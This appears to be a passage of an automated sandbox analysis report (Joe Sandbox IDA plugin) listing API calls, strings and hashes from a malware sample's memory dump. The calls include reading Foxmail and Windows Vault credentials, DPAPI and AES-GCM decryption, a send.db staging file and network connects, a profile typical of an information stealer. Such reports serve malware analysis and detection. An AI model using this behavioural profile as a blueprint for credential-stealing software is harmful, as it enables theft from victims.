                                                • Instruction Fuzzy Hash: 4A0124712803507BE22057659C0AFEB2BA88B89B41F104035F749BA1D0C9A8A880839C
                                                APIs
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CE9A
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEA5
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEB0
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEBB
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CEC6
                                                • LocalFree.KERNEL32(?,00000000,00000000,0040CAF5), ref: 0040CED1
                                                • LocalFree.KERNEL32(00000000,00000000,00000000,0040CAF5), ref: 0040CED4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLocal
                                                • String ID:
                                                • API String ID: 2826327444-0
                                                • Opcode ID: 47c525463b210852906738e17e9094fe2dc180302977f63d8cd6e62f7ece355f
                                                • Instruction ID: e5bdd054c72edd405893c5fb69fba9bb4791af85785efefa7983030c1237c843
                                                • Opcode Fuzzy Hash: 47c525463b210852906738e17e9094fe2dc180302977f63d8cd6e62f7ece355f
                                                • Instruction Fuzzy Hash: 1BF09C31050B14DBD7366B25DC48767B6F1BF80305F15093AD58161AB08779A896DB94
                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(80000001,software\Aerofox\FoxmailPreview,00000000,00020019,?), ref: 00409DB5
                                                • RegQueryValueExA.ADVAPI32 ref: 00409DDC
                                                • PathRemoveFileSpecA.SHLWAPI(004197B0), ref: 00409DE7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileOpenPathQueryRemoveSpecValue
                                                • String ID: Executable$software\Aerofox\FoxmailPreview
                                                • API String ID: 3687894118-2371247776
                                                • Opcode ID: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
                                                • Instruction ID: 0bac63cb233140f308035db5f7d86828bf01501f6a5ebf857ff9987f94d08bec
                                                • Opcode Fuzzy Hash: 28ba990561e6b3eb0aeea4ee47ce201ab51b9c295677a5cf9b519593c38b6ce1
                                                • Instruction Fuzzy Hash: 6EF08274284204FFEB108B51DD8AFDA7BBCDB85B44F104066F901F21C1D3B49941A518
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410C97
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410CAC
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00410CC4
                                                • CloseHandle.KERNEL32(00000000), ref: 00410CCF
                                                • CloseHandle.KERNEL32(00000000), ref: 00410CE0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 1789362936-0
                                                • Opcode ID: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
                                                • Instruction ID: 2e00dfdaa672dd9684fc02a2f22ff91a15fe0b01dd777914ba71400be5e2cff0
                                                • Opcode Fuzzy Hash: dbb6d2a3e1f78c4e63f1433d229d8ec0479cf8ed85dc0024f1e2f21a347d4ae9
                                                • Instruction Fuzzy Hash: 0B01D631200214BBD7245BF5EC4CBFF7ABCAB84765F104166F50592290E7B88CC19F99
                                                APIs
                                                • FreeLibrary.KERNEL32(?,00000001,?,00000000,0040B132), ref: 0040B9BA
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9CA
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9D8
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9E6
                                                • FreeLibrary.KERNEL32(?,?,00000000,0040B132), ref: 0040B9F4
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
                                                • Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B638
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B648
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B656
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B664
                                                • FreeLibrary.KERNEL32(?,?,?,00000000,0040ABDF), ref: 0040B672
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction ID: de1b090c5ecee71095dd0539afea7425d556fea4fcc2e68f80fdcb856166325a
                                                • Opcode Fuzzy Hash: c6f04016f119a1676d5edc8196b994047ff04996baf7bcc2377219981c399c0c
                                                • Instruction Fuzzy Hash: BCF0AEB1B00B26BED7495F768C84B86FE6AFF49260F01422BA52C42221CB716474DFD2
                                                APIs
                                                  • Part of subcall function 0040B559: LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040B561
                                                • FreeLibrary.KERNEL32(?), ref: 0040B506
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403248: lstrcmpW.KERNEL32(?,?), ref: 00403252
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                                • String ID: 4$8$Internet Explorer
                                                • API String ID: 708496175-747916358
                                                • Opcode ID: f1e9ef1a3c3d77be1e0826d64f48fac323e22ef8b737ab1ad594b7bd1a133e9d
                                                • Instruction ID: b6cee262d57798efbd2936ca721335ce7e6008c0fa62be54d2cf6ef3d4be9e9b
                                                • Opcode Fuzzy Hash: f1e9ef1a3c3d77be1e0826d64f48fac323e22ef8b737ab1ad594b7bd1a133e9d
                                                • Instruction Fuzzy Hash: D4A12371D00219ABDF15EFA6CC859DEBB79FF44708F10402AF405B7291EB38AA45CB98
                                                APIs
                                                • socket.WS2_32(00000017,00000001,00000006), ref: 0040F355
                                                • connect.WS2_32(00000000,?,0000001C), ref: 0040F37E
                                                • InetNtopW.WS2_32(00000017,?,?,00000802), ref: 0040F3B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectsocket
                                                • String ID: <5Ik
                                                • API String ID: 2247632992-1120072674
                                                • Opcode ID: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
                                                • Instruction ID: 0180e237ebb21dbc614bd4bebe7721a6296938b2e8f70b845b2fda00e0167cc6
                                                • Opcode Fuzzy Hash: d29b1ecdb4e48be8bf2ac1a270374fef9ed7a6ee3149c8623e764551c4d5f8e9
                                                • Instruction Fuzzy Hash: E401F772E00218BAE72096A19C4AFEF377CEF08720F000532F614E71C1E6B58D4487E4
                                                APIs
                                                • GetTempPathW.KERNEL32(00000400,?), ref: 0041327D
                                                • lstrcatW.KERNEL32(?,send.db), ref: 0041328F
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$FreePathTempVirtuallstrcat
                                                • String ID: 5$send.db
                                                • API String ID: 891666058-2022884741
                                                • Opcode ID: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
                                                • Instruction ID: d648c445d5d92e18bce2bb64044d3db85d8843b1a173332005f5648c28ac963a
                                                • Opcode Fuzzy Hash: d8e56f645b98f6c255315b6d1be1f473f104b00fffb9f83420bb7978253f092e
                                                • Instruction Fuzzy Hash: 5A017C71940118ABCB10EB65DC46BEE7BBCAF50309F00807AA505B2181EB789B46CBD8
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00413710
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00413722
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FolderFreePathVirtuallstrcat
                                                • String ID: ;$\Microsoft Vision\
                                                • API String ID: 1529938272-253167065
                                                • Opcode ID: 4da3fe99405f49955dbd7bbfbf2ecc4ebfd2d08027262b7171816c6352c623e7
                                                • Instruction ID: 53f0f5d706791bc013d25d8bebd25819b408b45714e2bf30d534f986f7503769
                                                • Opcode Fuzzy Hash: 4da3fe99405f49955dbd7bbfbf2ecc4ebfd2d08027262b7171816c6352c623e7
                                                • Instruction Fuzzy Hash: E0115EB1C00119BACB10EFA1DD49DDFBFB8EF55344F10416AB505B2181DB38AB85CB94
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040F3D9
                                                • connect.WS2_32(00000000,?,00000010), ref: 0040F3F6
                                                • InetNtopW.WS2_32(00000002,0040F029,?,00000802), ref: 0040F425
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectsocket
                                                • String ID: <5Ik
                                                • API String ID: 2247632992-1120072674
                                                • Opcode ID: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
                                                • Instruction ID: 1849f6337e539491ffe2d687a0a9c8bdfff1226e08de7d808908600c112c9109
                                                • Opcode Fuzzy Hash: d2616969f2c9092f28c7b577012a576a320f1554e3dbef7bb6aa5a5e76d146ba
                                                • Instruction Fuzzy Hash: 5B015A71A00208AAD710DBA59C4AEEFB7BCEF84750F504176F905E32D0EA708E4587A5
                                                APIs
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00413710
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 00413722
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FolderFreePathVirtuallstrcat
                                                • String ID: ;$\Microsoft Vision\
                                                • API String ID: 1529938272-253167065
                                                • Opcode ID: 25764ad4916311f979e6c93089d2d1c61dddf8e33a2d845b5791f30208703287
                                                • Instruction ID: 53e63a4236a49b8a302aa88940ac71d42f48ff56029f7dee3bcda8afb27f06c0
                                                • Opcode Fuzzy Hash: 25764ad4916311f979e6c93089d2d1c61dddf8e33a2d845b5791f30208703287
                                                • Instruction Fuzzy Hash: A70109B1C00119AACB10EFA1DD4AEDFBBBCAF55748F104166B505B2181EB38AB84CBD4
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F4E6
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F4F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                • Opcode ID: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
                                                • Instruction ID: ff8e9ccf2255d32ac1a8c1a67c9cd3443cff3f67e47653b677edfd40f96dca84
                                                • Opcode Fuzzy Hash: d4db957446379958144a63c4a6f79a62c0eac4aee9f7284df379ec929f0b27f0
                                                • Instruction Fuzzy Hash: 23E0D83078020C35CB346F756C0B7D77BA82B82749F4441B19542F16C2DB7CD94ACAE8
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040F535
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040F545
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                • Opcode ID: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
                                                • Instruction ID: 2f1c81511d61838f55941c07d8fb31d28f6a249911401150564ccb1d4a38bf96
                                                • Opcode Fuzzy Hash: 664726f24000f005279c552ddf1a120d3a192d674360c6057643559d785a8934
                                                • Instruction Fuzzy Hash: 7CE0123074021C66CB34AF71AC0AAD777A85B51745F0081B5A205E25C1DA78D989CE94
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040FC6D,?,?,00402D84,?,00414648,?,?,00000000,?), ref: 00410C4B
                                                • GetProcAddress.KERNEL32(00000000,?,0040FC6D,?,?,00402D84,?,00414648,?,?,00000000,?), ref: 00410C52
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: IsWow64Process$kernel32
                                                • API String ID: 1646373207-3789238822
                                                • Opcode ID: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
                                                • Instruction ID: aa38c12934784f8986f56b2f7d6e07c465e87370c79dbefe8b4e53ff979e27e3
                                                • Opcode Fuzzy Hash: a6984095b9629bf2e89983bd4f1e07a37862d1e6deb3951fbca43f367f5d7c3e
                                                • Instruction Fuzzy Hash: 90E08C3A640304FBDB24DBE1CC0ABCBB6ACEB44751B214159B001A2240EBB8DB408B98
                                                APIs
                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D18E
                                                • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 0040D1DD
                                                  • Part of subcall function 004033F5: lstrcpyA.KERNEL32(00000000,?,?,00000000,?,00402A97,?,?,00000000,exit,00000000,start), ref: 0040341A
                                                  • Part of subcall function 004057FB: getaddrinfo.WS2_32(770113FB,00000000,00404EA0,00000000), ref: 00405848
                                                  • Part of subcall function 004057FB: socket.WS2_32(00000002,00000001,00000000), ref: 0040585F
                                                  • Part of subcall function 004057FB: htons.WS2_32(00000000), ref: 00405885
                                                  • Part of subcall function 004057FB: freeaddrinfo.WS2_32(00000000), ref: 00405895
                                                  • Part of subcall function 004057FB: connect.WS2_32(?,?,00000010), ref: 004058A1
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D261
                                                • EnterCriticalSection.KERNEL32(?), ref: 0040D27E
                                                • LeaveCriticalSection.KERNEL32(?), ref: 0040D288
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$Leave$Enter$connectfreeaddrinfogetaddrinfohtonslstrcpysocket
                                                • String ID:
                                                • API String ID: 4195813003-0
                                                • Opcode ID: 969798bed8422ffa66327ee2b18fc53fe6cae6c57379716f7a23df82e7834667
                                                • Instruction ID: 7a94c8fae61b2e10d6092c111b0d62f0006c67d78966a4acde4d12fd3714661c
                                                • Opcode Fuzzy Hash: 969798bed8422ffa66327ee2b18fc53fe6cae6c57379716f7a23df82e7834667
                                                • Instruction Fuzzy Hash: 7331B571600606BBD704EBA1CC45FEAB7ACBF18314F10413AF519B21D1EF78AA048B98
                                                APIs
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6AA
                                                • FindResourceW.KERNEL32(00000000,00000001,00000010,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6BE
                                                • LoadResource.KERNEL32(00000000,00000000,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F6CA
                                                • FreeLibrary.KERNEL32(00000000,?,00000000,00000002,?,?,?,0040DCAA), ref: 0040F70F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoadResource$FindFree
                                                • String ID:
                                                • API String ID: 3272429154-0
                                                • Opcode ID: 0fd3b68753ab6d783186f6d84016acbf3520c6cb5308a64147bb628e71b90a35
                                                • Instruction ID: a8c57747a45cef537438fef7edfaf31d6c185fb3add6f7deab0be250028dcda8
                                                • Opcode Fuzzy Hash: 0fd3b68753ab6d783186f6d84016acbf3520c6cb5308a64147bb628e71b90a35
                                                • Instruction Fuzzy Hash: 3D01C0B5300A01AFD3184F29EC88AA6B7B4FF89314704C239E525C77A0D774D85AC7A5
                                                APIs
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                  • Part of subcall function 0040CC54: LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                  • Part of subcall function 0040CC54: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                  • Part of subcall function 0040CC54: LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                • LocalFree.KERNEL32(?,00000000,-0000003A,00000000,?), ref: 0040CA6C
                                                  • Part of subcall function 0040CA78: GetLastError.KERNEL32 ref: 0040CADE
                                                • LocalFree.KERNEL32(?), ref: 0040CA65
                                                  • Part of subcall function 0040CCB4: BCryptOpenAlgorithmProvider.BCRYPT(00000020,AES,00000000,00000000,?,00000000,?,?,?,0040CA5F,?), ref: 0040CCD1
                                                  • Part of subcall function 0040CCB4: BCryptSetProperty.BCRYPT(00000020,ChainingMode,ChainingModeGCM,00000020,00000000,?,0040CA5F,?), ref: 0040CCEA
                                                  • Part of subcall function 0040CCB4: BCryptGenerateSymmetricKey.BCRYPT(00000020,0040CA5F,00000000,00000000,?,00000020,00000000,?,0040CA5F,?), ref: 0040CCFF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Local$Free$BinaryString$AlgorithmAllocErrorGenerateLastOpenPropertyProviderSymmetric
                                                • String ID: $DPAPI
                                                • API String ID: 379455710-1819349886
                                                • Opcode ID: dabe7be40680fda6933c20434dd858ef31a71aa9e46db8101cfd5e2755da62df
                                                • Instruction ID: 04bf41e7008add8f4a3ae58a75aeb1b04db966ebd79b9b8d2087252f069c6e3c
                                                • Opcode Fuzzy Hash: dabe7be40680fda6933c20434dd858ef31a71aa9e46db8101cfd5e2755da62df
                                                • Instruction Fuzzy Hash: CE015E72A0010DFBDF10EBA1DD85EDEB778AB44705F118276E804F2184E734AB85DB98
                                                APIs
                                                • GetLastInputInfo.USER32 ref: 004047FF
                                                • GetTickCount.KERNEL32 ref: 00404805
                                                • GetForegroundWindow.USER32 ref: 00404819
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0040482C
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Windowlstrlen$CountForegroundFreeInfoInputLastTextTickVirtuallstrcpy
                                                • String ID:
                                                • API String ID: 2567647128-0
                                                • Opcode ID: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
                                                • Instruction ID: 9232618d2a95307947b37617596d42c9c757323c2ecaddd148e12c6a0cc08536
                                                • Opcode Fuzzy Hash: 53ec264987bf02e716b056fae7ea2858fb4bbd28a0d565d81be937b390888146
                                                • Instruction Fuzzy Hash: F51130B1D00108ABCB04EFB5DD49ADDBBBDEF98305F008169A402B3190EF786B44CB54
                                                APIs
                                                • GetCurrentThreadId.KERNEL32(?,00000000,00402A8C,00000000,exit,00000000,start), ref: 0040EA95
                                                • SetEvent.KERNEL32(00000000), ref: 0040EAA9
                                                • WaitForSingleObject.KERNEL32(0041956C,00001388), ref: 0040EAB6
                                                • TerminateThread.KERNEL32(0041956C,000000FE), ref: 0040EAC7
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Thread$CurrentEventObjectSingleTerminateWait
                                                • String ID:
                                                • API String ID: 2174867186-0
                                                • Opcode ID: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
                                                • Instruction ID: 7c0d11aeeb9ee8d7e55f87269beabb2428f5cdeac9d462a674e1c882548833a8
                                                • Opcode Fuzzy Hash: 2bcda7b74d8969f1d3be21ce305093a58f10729f55bf2d3cd7d934eaada06a5b
                                                • Instruction Fuzzy Hash: 4E0186311046009BE734AF13E949F96B7B2BF54311F104E3EE453628E0CBB968A9CF55
                                                APIs
                                                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,?,00402617,?,?), ref: 00407B2C
                                                  • Part of subcall function 00408617: GetCurrentProcess.KERNEL32(00419698,00407A03,?,?,?,?), ref: 0040861C
                                                  • Part of subcall function 00408617: IsWow64Process.KERNEL32(00000000), ref: 00408623
                                                  • Part of subcall function 00408617: GetProcessHeap.KERNEL32 ref: 00408629
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process$CurrentHeapOpenWow64
                                                • String ID: XXXXXX$YYj
                                                • API String ID: 1563638298-1957121946
                                                • Opcode ID: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
                                                • Instruction ID: e5732774cbe7b056c6d1e26ea42a9f4b70b4e0c322beca2f04b95ba6d31a2942
                                                • Opcode Fuzzy Hash: e401c90dc1eb9171c8b6cd42e689946692d9e3ad96f351f397a77a9d95864d86
                                                • Instruction Fuzzy Hash: 7331EBB1E081057FFF149A658D41BBF76ACDB90398F20413FF914E62C1FA78AD4146AA
                                                APIs
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                • RegOpenKeyExW.ADVAPI32 ref: 0040FCFC
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 00410FE6
                                                  • Part of subcall function 00410FC3: RegQueryValueExW.ADVAPI32(?,770113FB,00000000,770113FB,00000000,00000000), ref: 0041100A
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: QueryValuelstrlen$CloseFreeOpenVirtuallstrcpy
                                                • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                • API String ID: 1903904756-1211650757
